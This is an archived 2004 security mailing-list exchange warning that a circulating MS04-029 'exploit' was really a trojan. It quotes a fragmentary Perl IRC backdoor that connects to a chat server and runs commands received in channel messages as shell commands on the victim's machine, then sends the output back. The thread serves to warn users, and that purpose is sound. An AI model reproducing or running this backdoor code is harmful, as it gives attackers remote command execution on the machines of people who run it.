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MS04-029 Exploit = trojan!

From: alekc at (Aleksander P. Czarnowski)
Date: Thu, 4 Nov 2004 00:34:45 +0100

The sad or funny part (depends on your sens of humore) is that even if don't bother reading exploit source code before 
running it you can still see perl script with simple strings command run against binary. They could a least try to hide 
it a bit better on source code and binary level - after all tools like metasploit framework are used by people who can 
read assembly too ;-)
Just my 2 cents,
Aleksander Czarnowski
-----Original Message-----
From: Jerome ATHIAS [mailto:jerome.athias at]
Sent: Wednesday, November 03, 2004 11:09 PM
To: framework 
Subject: [framework] MS04-029 Exploit = trojan!

if fork;use 
IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print

$sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^
]+ ([^ ]+) 
/){$mode=$1;last if 
$sock "NICK 
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan 
:Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG
$chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* 
(.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG

$chan :$_\n";sleep 1;}}}#/tmp/hi

Doh! bad shit yes
SORRY guys - too fast - too bad

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